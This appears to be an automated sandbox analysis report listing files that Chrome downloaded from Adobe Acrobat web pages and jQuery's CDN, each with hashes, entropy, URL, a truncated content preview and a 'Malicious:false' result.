                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[1360],{olML:(e,n,t)=>{"use strict";n.o=function A4uAdd(e){var n=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},n,n),o.default.createElement("path",{fillRule:"evenodd",d:"M29,16H20V7a1,1,0,0,0-1-1H17a1,1,0,0,0-1,1v9H7a1,1,0,0,0-1,1v2a1,1,0,0,0,1,1h9v9a1,1,0,0,0,1,1h2a1,1,0,0,0,1-1V20h9a1,1,0,0,0,1-1V17A1,1,0,0,0,29,16Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(t("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var o in t)Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o])}return e},_extends.apply(this,arguments)}},"889w":(e,n,t)=>{"use strict";t.d(n,{A:()=>s});var o=t("DM6e"),r=t("klCL"),i=t.n(r);const a="safari",p="mobile safari",m="firefox",getBrowser=()=>(new(i())).getBrowser(),isSafari=()=>{const e=getBrowser().name.toLowerCase();r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (55678), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):55702
                                                      Entropy (8bit):4.90983684096283
                                                      Encrypted:false
                                                      SSDEEP:1536:7aX3W3q6amiyryU3x2yEmYwXnaRAJk6J5h9X7N6hn0A7Gy:sU3x2yEmYwXJk6/N6hn0A7Gy
                                                      MD5:DA7B0BAC96F64ED9A252F39886171F4B
                                                      SHA1:C0BAF54B064CB3E130FCAB581C921A869607AC0F
                                                      SHA-256:72494CD4E4584079B1E231615662D379101656C617F1123583297B395D6F089C
                                                      SHA-512:74CE02DC686A7AB8869A4D934FDFA5852C3C44BA6B55E6B3C02E9CADDCA1E594CE3CEF8A71964B5D1094F47B509BAA8F5186D884AFFE59F216D8F9576C5B05C6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/translations-en-US-json-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},o=(new e.Error).stack;o&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[o]="7fa54265-98e3-4f50-96f1-a5eecf515f8b",e._sentryDebugIdIdentifier="sentry-dbid-7fa54265-98e3-4f50-96f1-a5eecf515f8b")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[7818],{t39f:e=>{e.exports=JSON.parse('{"HOME":"Home","SOMETHING_WENT_WRONG":"Something went wrong","TRY_LATER":"We\'re sorry for the inconvenience. Please try again later.","tools.quick_start":"Quick start","received.just":"Just now","specialDates.today":"Today ","specialDates.yesterday":"Yesterday ","specialDates.tomorrow":"Tomorrow ","nonDueString.sendNTrack":"RECEIVED ","nonDueString.review":"REVIEW R
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:data
                                                      Category:downloaded
                                                      Size (bytes):4788874
                                                      Entropy (8bit):5.955460959627024
                                                      Encrypted:false
                                                      SSDEEP:24576:qP3cB9zd3ypYsUaqbVOOOrCzGY+8JjFmV6DpT+XkpDij50w/UBazaJyZzaXqn/YJ:VU8inbKsHq2U
                                                      MD5:90EA10DA8457514776057B76101D1B04
                                                      SHA1:22B4050C612F4EECC803238180750F5A92E10A70
                                                      SHA-256:41F262C93FA457BC2EADC075FC4510038B5E9970A36AD938487C6DFB4392CB95
                                                      SHA-512:5CFB3F8D96816F306AB05A5125F402FE88542AA86B48F22408BDCA33AF1C49881AD79BC84E70CEC872D34FE69293C56B652BEA1FEA4FDF50030B9AF0105C6ACE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.5c352f16d0b47ea14845f1b29d34fc07.part2.wasm
                                                      Preview:..@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!.... .$..@ .....4.....A. .E....@ .g .gj".A.K.. .A.F.@ .A.F.. .A.F.. .. ..~B .P...#.!..@.@A....!..4 . .A...j...!..-. .$..@ .....4..... . .l".AyO.( .A.j.!. . .A.q6... . . .Axqk6... . .A.v".6... . .A.v .k".6... .A..j ....!. .A.:... .A.:... .A.:... . .A..j6....@ .A.j .A..jA.....). .$. .#.A..=j6... .(..."..@#.!. . .6...#.(..".!..@#. .G.@ .A.j .A..j .A.k-...". .(.. .A.k".(..kA.k6.. .....#.(..".(.. .(..". .(..k".A. . .O.I.@ .A.6.... .$....... .-....@ .A.:.... .-....@ .A.:......... ..@ .A..;... . .6... . .6... .A.:... .A.:... .A.:... . .6... .A.:... .A.:... .#.A..=j6....@ ..@ .!..@ ..... .(...!. .A.k".... .A.:... .-...... .A.:.... . .A..j6... . .A..j".6... . . ...7...A.!....@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!..). .$..@ .....4.....A. .E....@ .g .gj".A.K.. .A.F.@ .A.F.. .A.F.. .. ..~B .P...#.!.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (6350)
                                                      Category:downloaded
                                                      Size (bytes):6397
                                                      Entropy (8bit):5.412175017074974
                                                      Encrypted:false
                                                      SSDEEP:192:necdIhbJig+1OE1CO1kZjHyw1zoY5U9hIem1:nxdIXBPE1CNZbyw1Bks
                                                      MD5:2D7528A8B93F65D5182C29C1B96DB0CE
                                                      SHA1:7B7EAFA05E042319AF9555B496BF8BA4026BCD51
                                                      SHA-256:192A92935ABF0637141225A0F014AB7EF55F3F2967565023FD14B00CED97ABB6
                                                      SHA-512:FFFDDF99383078B8CC405A28101CFC4D5CFCD8DB931DFEEE5A950BF60651C021A78AA7C897D24EBAE05AE2B96E57561FC2FBDB1D75637197226EE6C36952DDBA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/5794-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5794],{vS73:(t,e,r)=>{"use strict";var a;r.d(e,{B:()=>a}),function(t){t.TRY_NOW="TRY_NOW",t.OPT_IN_COMPLETE="OPT_IN_COMPLETE",t.WAITLISTED="WAITLISTED"}(a||(a={}))},"T/bE":(t,e,r)=>{var a=r("94sX"),o=r("ue/d"),n=r("eVIm"),s=r("RGrk"),i=r("Z2pD");function Hash(t){var e=-1,r=null==t?0:t.length;for(this.clear();++e<r;){var a=t[e];this.set(a[0],a[1])}}Hash.prototype.clear=a,Hash.prototype.delete=o,Hash.prototype.get=n,Hash.prototype.has=s,Hash.prototype.set=i,t.exports=Hash},duB3:(t,e,r)=>{var a=r("WxI4"),o=r("dFpP"),n=r("JBvZ"),s=r("2Hvv"),i=r("deUO");function ListCache(t){var e=-1,r=null==t?0:t.length;for(this.clear();++e<r;){var a=t[e];this.set(a[0],a[1])}}ListCache.prototype.clear=a,ListCache.prototype.delete=o,ListCache.prototype.get=n,ListCache.prototype.has=s,ListCache.prototype.set=i,t.exports=ListCache},POb3:(t,e,r)=>{var a=r("ICSD")(r("TQ3y"),"Map");t.exports=a},YeCl:(t,e,r)=>{var a=r("CW5P"),o=r("A9mX"),n=r("v8Dt
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (63800)
                                                      Category:downloaded
                                                      Size (bytes):63884
                                                      Entropy (8bit):6.0844253904080405
                                                      Encrypted:false
                                                      SSDEEP:768:Y78dWccWDMy8vIZX90kifPhUqLhUqfKEuZv65SbudAAsUijMSX5dUDiSzk3qW92t:qccWg4qhUqLhUqaBnvaOLSzkH/PG+m
                                                      MD5:F349BB7E4CEFDC84D853776CF60F9965
                                                      SHA1:37CF17422D2D3272A4CBF90D0EA0F3AA6FEACE7F
                                                      SHA-256:5744A5C71E071DFE4D5149D5313A0D79A72238D6E48BBF709882EB04E38C226A
                                                      SHA-512:344710A318E0341109353DD5245A8549569EBCB0B68A080ABBB411A4AB1F7C5546BA69D62E09198C0CC38B01DC496949CF093DB7FDAC7AA96BDAD46A75DB49C1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/ftecommentsverb-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[8935],{jQUh:(t,e,r)=>{t.exports=r("rECp")},rECp:(t,e,r)=>{"use strict";var o=r("AAps");Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var a,n,A,i=o(r("jp00")),s=o(r("QNma")),c=o(r("vPca")),l=o(r("khqL")),p=o(r("qavZ")),u=o(r("qJYQ")),d=o(r("i44B")),C=o(r("uqI5")),m=o(r("/QgZ")),g=o(r("o+6g")),h=o(r("7ZnH")),f=o(r("qVy9")),b=o(r("Cben")),I=o(r("/hLX")),E=o(r("YWiy"));function ownKeys(t,e){var r=Object.keys(t);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(t);e&&(o=o.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),r.push.apply(r,o)}return r}function _objectSpread(t){for(var e=1;e<arguments.length;e++){var r=null!=arguments[e]?arguments[e]:{};e%2?ownKeys(Object(r),!0).forEach((function(e){(0,d.default)(t,e,r[e])})):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(r)):ownKeys(Object(r)).forEach((function(e
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (21802)
                                                      Category:downloaded
                                                      Size (bytes):21849
                                                      Entropy (8bit):5.53488144353243
                                                      Encrypted:false
                                                      SSDEEP:384:7nzjHTLpYw+kuuSqrPjc9VYhWaacZ3ssbQlDmyLw+/XcqMMVyUkL9pBZpriXoqfE:zzjHfpW9yNR+/MqMMVyUkppBsXfZJm/h
                                                      MD5:F623851EF94FFDE62F5D31ED39789BF5
                                                      SHA1:7F176A9C5739BC268920791B0042C3942A731611
                                                      SHA-256:3AFF2668EF65E0F12467A39C05E7D63A073D2E7A9AA979D21AB1D747D4EBB845
                                                      SHA-512:54C346A2C722152DDA8F3E450AB9EFBA586AFDF4DC04D55A703E380F5A9FB83909BF3C6BD3C3778B489F975C980F9ADBB8AF53A7070D6393D37B42BB3C2B868D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/5629-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5629],{a75v:(e,t,n)=>{"use strict";n.d(t,{v2:()=>copyConversation,xQ:()=>copyRichText,mj:()=>copySelectedText,GU:()=>copySummary,Bs:()=>copyTextWithFormattingToClipboard,m4:()=>getExcludedElements,Y0:()=>getSelectedTextInGFM,WU:()=>isCopyAllowed,Eg:()=>removeExcludedElements,b$:()=>replaceTextFromDataCopy,SU:()=>shareSummary});var r=n("/NRg"),i=n("3aG4"),o=(n("zjjr"),n("vZUK")),a=n("6Eex"),l=n("PGMW"),c=n("3v0I"),s=n("wQpj");function repeat(e,t){return Array(t+1).join(e)}var u=["ADDRESS","ARTICLE","ASIDE","AUDIO","BLOCKQUOTE","BODY","CANVAS","CENTER","DD","DIR","DIV","DL","DT","FIELDSET","FIGCAPTION","FIGURE","FOOTER","FORM","FRAMESET","H1","H2","H3","H4","H5","H6","HEADER","HGROUP","HR","HTML","ISINDEX","LI","MAIN","MENU","NAV","NOFRAMES","NOSCRIPT","OL","OUTPUT","P","PRE","SECTION","TABLE","TBODY","TD","TFOOT","TH","THEAD","TR","UL"];function isBlock(e){return is(e,u)}var d=["AREA","BASE","BR","COL","COMMAND","EMBED",
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65465)
                                                      Category:downloaded
                                                      Size (bytes):814232
                                                      Entropy (8bit):5.571699479171578
                                                      Encrypted:false
                                                      SSDEEP:12288:bG6s6LBOWqKk6BzRs8pW14WNXSUBoBnsugasP+aDT:NBPRk2W1LXSUBoBnsugasP+aDT
                                                      MD5:62C1A03A1978F51F9D2DCB34396AD06B
                                                      SHA1:2FA8E361D2B2B37A40A47CCAAEA1B0792F73C37D
                                                      SHA-256:557BE8E34654E7E7A9FF8B6466217024877944A3AC4090904A523F7C61A63BD1
                                                      SHA-512:6797D8ABEB1DD54965412CE4ABEA73540781A196D10C31F216C3E5FAD0130B015673B3EBAE2FBFF5601E0C6CF0D0B4B6872154570E7350621147BFC19CF7C6AA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/bootstrap.js
                                                      Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,o,n,r={Lr2o:(e,t,o)=>{e.exports=o("vWpX")},vWpX:(e,t,o)=>{"use strict";var n=o("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var r,s,a,l=n(o("2Xkx")),c=n(o("b5pe")),p=n(o("nqKB")),d=n(o("QNma")),u=n(o("vPca")),m=n(o("khqL")),h=n(o("qavZ")),g=n(o("uYxp")),A=n(o("qJYQ")),C=n(o("i44B")),b=n(o("uqI5")),y=o("0sBc"),v=n(o("PZ3W")),_=n(o("uT4t")),E=n(o("vsH4")),T=o("d1ru"),O=n(o("K93r")),S=n(o("/hLX")),I=n(o("YWiy")),D=n(o("adDv")),w=n(o("Fsu/"));o("C8sF");var P=function getLabel(e){return"string"==typeof e?e:e.label},R="-listbox",x="-option-",M=(0,_.default)(r=(0,b.default)((a=s=function(e){function Autocomplete(e){var t;return(0,d.default)(this,Autocomplete),t=(0,m.default)(this,(0,h.default)(Autocomplete).call(this,e)),(0,C.default)((0,g.default)(t),"state",{value:"",showMenu:!1,results:[],selectedIndex:-1,isFocused:!1}),t.autocompleteId=(0,E.default)(),t}var t,o;return(0,A.default)
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (60343), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):60451
                                                      Entropy (8bit):4.84427111143524
                                                      Encrypted:false
                                                      SSDEEP:768:fSqR/SvKBpOshj6/eh46C3WSbXDEh8j7ib3bcp6gG5bF:6vK7hiehE35bXDIGZMgG5B
                                                      MD5:09D3270D23FF0BC3E110CF78C83BC109
                                                      SHA1:7C2D94BE858A95D11739366CC3DD144168FF3FA4
                                                      SHA-256:6F749AC44FE6015BD138B215C586756EC0D6DD479748FEF1E70EB6E3EABC4C6C
                                                      SHA-512:4715B4B7133EFD826CA67EEE71683852CB424992E334357C6ECB1A79DCB6BD626CD7477BA7B98DC700F539E5DAE86E91407B5176577D5283F55A9DF00C96D07B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-marketing/3.67.0_2.855.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-marketing"]=self["webpackJsonp-marketing"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"err.not.entitiled":"You are not entitled to this feature. Please contact your admin.","appcenter.under.construction":"Under Construction...","appcenter.generic.error":"We are having trouble rendering this page. Please check back later.","appcenter.user.not.allowed.for.individual.purchase":"Please contact your admin to enable this feature.","appcenter.feature.not.available":"This is a restricted feature. Please check with your administrator.","apps.label":"Apps","button.name.purchase":"Purchase","button.name.upgrade":"Upgrade","button.name.subscribe":"Subscribe","button.name.sys.req":"System Requirements","button.name.download":"Download","button.name.cancel":"Cancel","button.name.learn.more":"Learn More","label.name.desktop.apps":"Desktop apps","label.name.mobile.apps":"Mobile apps","appcenter.header.line1":"Do more with Adobe Document Cloud","appcenter.header.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (20391)
                                                      Category:downloaded
                                                      Size (bytes):20450
                                                      Entropy (8bit):5.208918451931349
                                                      Encrypted:false
                                                      SSDEEP:384:rdoi77dVu+kWZJAGuNvNsNrY+hb9AVIRzYbI81Fd7iHlUJpk7U1ojyP7CIukSrJ:r1dVkCuWREI81Fd7iHlUJQU1ojQ7CIu/
                                                      MD5:BE77FA4ED0B9E0C98238C66F6AF208B4
                                                      SHA1:50286C221D662460B0E89E9482762BF028A66E9C
                                                      SHA-256:14595713CF385515517793C526E127FA9146464EEBD607A017B0BC677DA779D3
                                                      SHA-512:97B70DAF7C4CFCF9B98592DB2F640F7B9C4E1BDBC18C5E6B50830235720BD619D9EF48B5D55C2272FF71068B5DFA8DCB13B2BB320723A2198CE8411EE511C548
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/CommentsProvider-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[930],{HwaR:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function defineProperties(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(e,t,n){return t&&defineProperties(e.prototype,t),n&&defineProperties(e,n),e}}(),i=n("Gcvr");var o=function(){function Client(){!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Client),this._environment="stage",this._apiKey=null}return r(Client,[{key:"_validate",value:function _validate(){if(!this._suggestionApiHref){if(this._environment&&this._endpoint&&this._apiKey)return this.discover();throw new Error("People Graph SDK has not been properly configured yet.")}return Promise.resolve()}},{key:"configure",value:function configure(e){var t=e.acceptHeaderVersio
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, baseline, precision 8, 927x1200, components 3
                                                      Category:dropped
                                                      Size (bytes):82477
                                                      Entropy (8bit):7.190324114307434
                                                      Encrypted:false
                                                      SSDEEP:1536:2wL/aQQUscALVacC6f61SncSCgZnMv0nDB:2wkNcnDwnhZvN
                                                      MD5:EC9588C5F5BDEC4F34246D07E12510AF
                                                      SHA1:1E8CC5DE83737D1859A18864452D08FF1E4F32A8
                                                      SHA-256:1E94B6394917E8B95E3BD9D4B514CF4135EDDA6A2B9E7BFD2EE22B574C84A251
                                                      SHA-512:AB64E26A41A754ED5AE98BA9974B7A44749227077B0A85213C6EF0B65B1FCC46ADCFA6309CB4C56CC9A74A522390A67155164CDC9D0CC9B0C8F632617BA6D5E8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.997762c, 2025/01/14-12:18:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"> <xmpMM:DerivedFrom rdf:parseType="Resource"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):336566
                                                      Entropy (8bit):5.968804452349029
                                                      Encrypted:false
                                                      SSDEEP:6144:kWBIPyWXqB4fmTX/P42OEzG5QIFfbNWqle0jIeiFWDWuUCN4qDyJOZQrKHgjatjr:kWBIPyWXqB4En7OEzG5QIFfbNWqle7e3
                                                      MD5:96E92276C52CAE385A78F990754299B6
                                                      SHA1:9C2362340142B4F98662439EADD5668A972F727C
                                                      SHA-256:46E87657EE9CA32E19D5605D256887F605BACAAD028B443905A2FCAFEA00E079
                                                      SHA-512:9689B95F7072991A5A840F4FD834A192F3AC429293E3B23A4FCC13DD6E307485C08EB708D010DD485D0204CCEE53AF7007E31AA643052B1B648568659F389EDB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-sign-authoring2-dropin/3.59.4_4.1111.0/bootstrap.js
                                                      Preview:!function(){var e,t,i,n,r={oTLO:function(e,t,i){var n={"./ca-ES.json":["rSUg",2429],"./cs-CZ.json":["6QwQ",250],"./da-DK.json":["legV",3089],"./de-DE.json":["uENs",695],"./en-GB.json":["BJ5E",3657],"./en-US.json":["WoRQ",3972],"./es-ES.json":["izPs",8121],"./eu-ES.json":["plaV",6059],"./fi-FI.json":["mAC3",9807],"./fr-FR.json":["SODL",9017],"./hr-HR.json":["iirH",1209],"./hu-HU.json":["Xble",1159],"./id-ID.json":["LUeu",8831],"./in-ID.json":["Obyk",5197],"./is-IS.json":["3qPT",6905],"./it-IT.json":["8x+4",4335],"./ja-JP.json":["a3Qr",8620],"./ko-KR.json":["pat7",3582],"./ms-MY.json":["YjQp",1559],"./nb-NO.json":["WzvF",1818],"./nl-NL.json":["Adil",1741],"./nn-NO.json":["Ka0h",9166],"./no-NO.json":["2mWJ",6823],"./pl-PL.json":["deTU",9237],"./pt-BR.json":["XJEY",4425],"./pt-PT.json":["4WGP",5109],"./ro-RO.json":["7mcm",9151],"./ru-RU.json":["IWnU",8671],"./sk-SK.json":["A0R5",2445],"./sl-SI.json":["nFro",1060],"./sv-SE.json":["OHKq",5118],"./th-TH.json":["Y2CG",1917],"./tr-TR.json":["iU
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (7575), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):7575
                                                      Entropy (8bit):5.1554257655905715
                                                      Encrypted:false
                                                      SSDEEP:192:aRHMEYGmkxTtZ1LwS8rLYPTbjYgEX/hq9/LUh2rSdaE:aRsEYGmkxTtZ1LP8rLkMZM9MaE
                                                      MD5:8DFBAA7FC2C14D67EE67069E2AA854F7
                                                      SHA1:02DC0D55631CDE1296F779FAE9A3A34C5C09FC24
                                                      SHA-256:253DC35986C08BDA036B6C2C36AB97C5A7A42E750C6ED646DA1C47FBCE68A736
                                                      SHA-512:9024C5B778F42813313618EB37B6AA2AEBA513C1A8D272733AC4FDA2447363550CBDB5AB182B2B9CD5BB20049661E98DC66A2EBF85F3CB6DD19D8783D487B32F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/translations-en-US.js
                                                      Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[327],{t39f:e=>{e.exports=JSON.parse('{"APPS":"Apps","DOCUMENT_CLOUD":"Document Cloud","FILES":"Files","HOME":"Home","VIEWS":"For Viewing","REVIEWS":"For Review","SIGNATURES":"For Signature","ORGANIZER":"Organizer","SHARE":"Share","SHARED":"Shared","SHARED_DOCUMENTS":"Shared Documents","SIGN":"Sign","SIGN_OUT":"Sign Out","STARRED":"Starred","UPLOAD_ETC":"Upload etc.","SOMETHING_WENT_WRONG":"Something went wrong","TRY_LATER":"We\'re sorry for the inconvenience. Please try again later.","ACCESS_DENIED":"Access Denied","NO_ACCESS_MSG":"You do not have access to this service. Contact your IT administrator to gain access.","SIGN_IN_DIFF":"Sign in with a different account","IN_BETA_COHORT_PARA1":"Thank you for participating in the Beta program for the next generation of Adobe Document Cloud.","IN_BETA_COHORT_PARA2":"We are constantly adding exciting capabilities to the Beta, but this feature is still under dev
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (17627)
                                                      Category:downloaded
                                                      Size (bytes):17675
                                                      Entropy (8bit):5.381387656900792
                                                      Encrypted:false
                                                      SSDEEP:384:2C5LRK7YaLhW9BOFG18h89vtVgJxB65bl2PSp9PR+0W6/dmmxVLdUDk6ZW9U4zzv:2C5LRKsaLhWqFzh89vtVge2PSpxR+rKr
                                                      MD5:D9FDDFE5D2C3F4AF5D6BABB808AF699C
                                                      SHA1:228E1F9005C24BCE375325FCC2350D5516E75BE6
                                                      SHA-256:C9F486333E0A639F2FB9CF607C999BB755C75A8298500252EA02DD353184BE01
                                                      SHA-512:CBAE9062D35548B65CAEE08C78CF73BB7BC97A591DBAC704DC224825AC4E33987ADF974954CC35282D90F79687A9D6EBCE5F12A0DD6319B6584213F48DE8DDD3
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/google-yolo.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[8644],{"2UxU":(e,t,o)=>{"use strict";o.d(t,{Z:()=>n});const n={ONE_TAP:"oneTap",BUTTON:"button",ONE_TAP_WITH_BUTTON:"oneTapWithButton"}},bcmf:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>R});var n=o("YWiy"),a=o("bF6B"),r=o.n(a),i=o("/hLX"),s=o.n(i),l=o("plsW"),c=o("PZ3W"),d=o.n(c),p=o("U8dO"),_=o("Hn3k"),u=o("YNPS");const triggerIMSLogin=async(e,t,o)=>{const n=new URLSearchParams;n.append("idp_token",e),n.append("state",t),n.append("device_id",r()()),n.append("provider_id","google"),n.append("scope",_.ug),n.append("accepted_tou_list","ADOBE_MASTER"),n.append("response_type","implicit_jump");try{const e=await fetch(`${l.envUtil.getEnvVar("ims_authorize_pac_uri")}?client_id=${l.envUtil.getEnvVar("dcweb_client_id")}`,{method:"post",body:n});return{result:{...await e.json()},ok:e.ok,status:e.status}}catch(n){if(o>0)return await new Promise((e=>setTimeout(e,1e3))),triggerIMSLogin(e,t,o-1);throw n}},utils_st
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65471)
                                                      Category:downloaded
                                                      Size (bytes):833976
                                                      Entropy (8bit):5.587299705307211
                                                      Encrypted:false
                                                      SSDEEP:24576:Qxelefuv6KuGjRfxtAG0btIp29ADX9v4Prqaul7wdDc40gxC87hIP7UgxCOwR:Qxelefuv6KuGjRfxtAG0btIp29ADX9vE
                                                      MD5:A13C8DF493EB54DA6E1E484F9F1778E7
                                                      SHA1:1B2EECE9750B7F000220447209509C5CC4E6BD31
                                                      SHA-256:E7C221CE1EFBEF61083AF7C082D20886747BF6441E9C89552FC775E91F861AD1
                                                      SHA-512:C1761385EC41FEBA9E2D23AAFC46F23841D9E209C75A2DDC0F3FD6BA61BC1BCAFE98EBAED23304537FF1D229A42D8940261C92FCD42416C35FE5145E1CFA4D64
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-core/3.70.1/dc-core.js
